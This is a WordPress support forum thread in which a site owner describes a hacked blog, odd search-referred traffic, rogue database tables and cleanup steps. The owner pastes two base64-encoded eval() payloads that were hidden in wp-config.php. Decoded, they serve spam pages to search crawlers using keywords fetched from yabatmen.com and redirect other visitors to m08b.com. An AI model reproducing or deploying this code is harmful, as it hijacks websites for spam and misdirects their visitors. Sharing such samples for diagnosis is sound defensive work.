jafro

74.222.101.10: https://www.google.com/search?hl=en&q=employment+for+cokecola+in+bishopville+sc&btnG=Google+Search&aq=f&oq=

71.207.208.143:
https://www.google.com/search?q=watch+predator+x+history+channel+%2Bfull&hl=en&rlz=1T4ADBS_enUS311US311&start=10&sa=N

They all seem to go to my wp-root-dir (/).

Here are some of the IP-s hitting me, mostly from the US, but also some other regions (NZ and NO (when I’m from).

72.84.148.79 (US)
71.207.208.143 (US)
74.222.101.10 (US)
74.222.101.10 (US)
24.98.77.65 (US)
222.152.253.250 (NZ)
76.120.184.250 (US)
173.66.164.227 (unknown)
99.130.38.136 (US)
24.91.27.86 (US)
68.46.245.102 (US)
129.241.125.53 (NO)

Here is the answer from Dreamhost-support:

Me:

“Since the other sites running on my serverspace isn’t affected (or so it seems), I guess the attack is related to jafro.org. And since I always update to latest WP-version, i guess that the attack was related to me running a somewhat old theme (although I have never heard about something
like that). “

DH Support:
We’ve been seeing this more and more, as themes are starting to
regularly include plugins that are built in. You’ll need to keep those as up to date as possible as well.

I’ve had no problems since I removed the nasties and changed my skin. But I do find it quite annyoing that it is possible to write code directly into wp-config.php, which is write-protected by all but my own user, but I guess that’s the way it goes. Guess I will keep it read-only from now on.

Is it possible to mark this thread as solved?

I found the bad tables in the DB, and managed to clean them out successfully by dropping the tables mysqladmin. They contained the phrase “xhebjz”. Here is an image of the table-names.

Also, I had these ugly, encrypted entries in my wp-config.php, which i fantasticly enough did overlooked earlier today:

// Change the prefix if you want to have multiple blogs in a single database.
																	eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO2lmKCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSl7JGtleXdvPXN0cl9yZXBsYWNlKCcvJywnJywkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ10pOyRrZXl3bz1zdHJfcmVwbGFjZSgnLScsJysnLCRrZXl3byk7JGtleXdveD1zdHJfcmVwbGFjZSgnKycsJyUyMCcsJGtleXdvKTskdGl0bD1zdHJ0b3VwcGVyKHN0cl9yZXBsYWNlKCcrJywnICcsJGtleXdvKSk7JGhvc3R0PSRfU0VSVkVSWydIVFRQX0hPU1QnXTskcGF0aGgzPSRfU0VSVkVSWydSRVFVRVNUX1VSSSddOyRwYXRoaDI9ZXhwbG9kZSgiPyIsJHBhdGhoMyk7JHBhdGhoID0gJHBhdGhoMlswXTskYWdlbnQ9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddO2lmKGVyZWdpKCJnb29nbGUiLCRhZ2VudCl8fGVyZWdpKCJzbHVycCIsJGFnZW50KXx8ZXJlZ2koIm1zbmJvdCIsJGFnZW50KSl7JHVyZD1yYW5kKDAsMTUwKTtlY2hvICI8SFRNTD48SEVBRD48VElUTEU+Ii4kdGl0bC4iPC9USVRMRT48TUVUQSBodHRwLWVxdWl2PUNvbnRlbnQtVHlwZSBjb250ZW50PVwidGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04XCI+PE1FVEEgY29udGVudD1cImluZGV4LGZvbGxvd1wiIG5hbWU9Uk9CT1RTPjxNRVRBIGh0dHAtZXF1aXY9XCJDb250ZW50LUxhbmd1YWdlXCIgY29udGVudD1cImVuXCI+PC9IRUFEPjxCT0RZPjxIMT4iLiR0aXRsLiI6PC9IMT4iOyRkb21haW4xPSJ5YWJhdG1lbi5jb20iOyRmaWxlMT0iL2FsbG15a2V5LnR4dCI7JGZwMT1mc29ja29wZW4oJGRvbWFpbjEsODAsJGVycm5vLCRlcnJzdHIsMzApO2lmKCEkZnAxKXtwcmludCAiRXJyb3I6ICRlcnJzdHIgWyRlcnJub10iO31lbHNle2Z3cml0ZSgkZnAxLCJHRVQgJGZpbGUxIEhUVFAvMS4wXHJcbiIpO2Z3cml0ZSgkZnAxLCJIb3N0OiAkZG9tYWluMVxyXG5cclxuIik7d2hpbGUoIWZlb2YoJGZwMSkpeyRob3N0MS49ZnJlYWQoJGZwMSw1MTIpO31mY2xvc2UoJGZwMSk7fXByZWdfbWF0Y2hfYWxsKCIhPGJlZ2luPihbXjxdKyk8ZW5kPiEiLCRob3N0MSwkbWF0Y2hlczEpOyRkb21haW4zPSJ3d3cuZ29vZ2xlLmNvbSI7JGZpbGUzPSIvaWU/cT0iLiRrZXl3by4iJmhsPWVuJmZpbHRlcj0wJm51bT0xMDAmc3RhcnQ9Ii4kdXJkOyRmcDM9ZnNvY2tvcGVuKCRkb21haW4zLDgwLCRlcnJubywkZXJyc3RyLDMwKTtpZighJGZwMyl7cHJpbnQgIkVycm9yOiAkZXJyc3RyIFskZXJybm9dIjt9ZWxzZXtmd3JpdGUoJGZwMywiR0VUICRmaWxlMyBIVFRQLzEuMFxyXG4iKTtmd3JpdGUoJGZwMywiSG9zdDogJGRvbWFpbjNcclxuXHJcbiIpO3doaWxlKCFmZW9mKCRmcDMpKXskaG9zdDMuPWZyZWFkKCRmcDMsNTEyKTt9ZmNsb3NlKCRmcDMpO30kaG9zdDM9c3RyX3JlcGxhY2UoJzxhIHRpdGxlPSInLCc8YmVnaW4+JywkaG9zdDMpOyRob3N0Mz1zdHJfcmVwbGFjZSgnIiBocmVmPScsJzxlbmQ+JywkaG9zdDMpO3ByZWdfbWF0Y2hfYWxsKCIhPGJlZ2luPihbXjxdKyk8ZW5kPiEiLCRob3N0MywkbWF0Y2hlczMpO2ZvciAoJGw9MDsgJGw8IGNvdW50KCRtYXRjaGVzM1swXSk7ICRsKyspeyR0ZXh0MT1zdHJ0b2xvd2VyKCRtYXRjaGVzMVsxXVskbF0pOyR0ZXh0Mj1zdHJ0b3VwcGVyKHN0cl9yZXBsYWNlKCctJywnICcsJHRleHQxKSk7ZWNobyAiPGEgaHJlZj0naHR0cDovLyIuJGhvc3R0LiIvIi4kcGF0aGguIj8iLiR0ZXh0MS4iLyc+PGltZyBzcmM9J2h0dHA6Ly95YWJhdG1lbi5jb20vaW1nLyIuJHRleHQxLiIxLmpwZycgYm9yZGVyPTAgYWx0PSciLiR0ZXh0Mi4iJz4iLiR0ZXh0Mi4iPC9hPiI7ZWNobyAiPGJyPiI7JHRleHQzPSRtYXRjaGVzM1sxXVskbF07ZWNobyBzdHJpcF90YWdzKCR0ZXh0Myk7ZWNobyAiPGJyPiI7fWVjaG8gIjxiPjxhIGhyZWY9I3RvcD4iLiR0aXRsLiIgMjAwOTwvYT48L2I+PC9CT0RZPjwvSFRNTD4iO2V4aXQoKTt9aGVhZGVyKCJIVFRQLzEuMSAzMDIiKTtoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbTA4Yi5jb20vaW4uY2dpPzImcGFyYW1ldGVyPSRrZXl3b3giKTtleGl0O30='));
$table_prefix  = 'wp_';   // example: 'wp_' or 'b2' or 'mylogin_'
																	eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyRhZ2VudD0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107aWYoZXJlZ2koImdvb2dsZSIsJGFnZW50KXx8ZXJlZ2koInNsdXJwIiwkYWdlbnQpfHxlcmVnaSgibXNuYm90IiwkYWdlbnQpKXskZG9tYWluMT0ieWFiYXRtZW4uY29tIjskZmlsZTE9Ii9hbGxteWtleS50eHQiOyRmcDE9ZnNvY2tvcGVuKCRkb21haW4xLDgwLCRlcnJubywkZXJyc3RyLDMwKTtpZighJGZwMSl7cHJpbnQgIkVycm9yOiAkZXJyc3RyIFskZXJybm9dIjt9ZWxzZXtmd3JpdGUoJGZwMSwiR0VUICRmaWxlMSBIVFRQLzEuMFxyXG4iKTtmd3JpdGUoJGZwMSwiSG9zdDogJGRvbWFpbjFcclxuXHJcbiIpO3doaWxlKCFmZW9mKCRmcDEpKXskaG9zdDEuPWZyZWFkKCRmcDEsNTEyKTt9ZmNsb3NlKCRmcDEpO31wcmVnX21hdGNoX2FsbCgiITxiZWdpbj4oW148XSspPGVuZD4hIiwkaG9zdDEsJG1hdGNoZXMxKTtmb3IgKCRsPTA7ICRsPCBjb3VudCgkbWF0Y2hlczFbMF0pOyAkbCsrKXskdGV4dDE9c3RydG9sb3dlcigkbWF0Y2hlczFbMV1bJGxdKTskdGV4dDI9c3RydG91cHBlcihzdHJfcmVwbGFjZSgnLScsJyAnLCR0ZXh0MSkpO2VjaG8gIjxhIGhyZWY9Jz8iLiR0ZXh0MS4iLyc+PGltZyBzcmM9J2h0dHA6Ly95YWJhdG1lbi5jb20vaW1nLyIuJHRleHQxLiIxLmpwZycgYm9yZGVyPTAgYWx0PSciLiR0ZXh0Mi4iJz4iLiR0ZXh0Mi4iPC9hPiI7ZWNobyAiPGJyPiI7fX0='));

I would be great if anyone could decrypt them. The file was dated 12th december. The day 2.7 came out? Anyhow, the admin-panel worked flawlessly just some days ago.

I guess this was an old, known exploit, which trigged because of my old theme (an old, adapted version of Kubrick). If anyone have a clue which exploit that was, I would appreciate it.

Using Control Panel you can look into the tables. A good test would be to see if there are more users in the users table than there are supposed to.

I don’t understand how to actually do this step.

Anyhow, I renamed my old wordpress-folder, and did a clean install of 2.7.1.

Copied my old wp-config to new install.

Blog got all white, but the new wp-install-admin-panel did find that the previous theme wasn’t there anymore and reverted to default theme.

But the evil is still there. Guess the malicious code got in the DB then?

I agree, it does not seem interesting for anybody to do this to a any blog. The admin would be the first to find out, and so far the rest of the blog itself is not harmed. Although, the issues I describe may be part of a partially failed exploit.

I can’t:
– change theme from admin-panel (freezes on loading preview)
– export database from admin-panel

I can:
Export database with mysql-dump (but I don’t think I can understand from the contents there if there is malicious content in the database).

I guess this is good in one way – it most certainly motivates me to update the theme I use and cleaning out som old debris.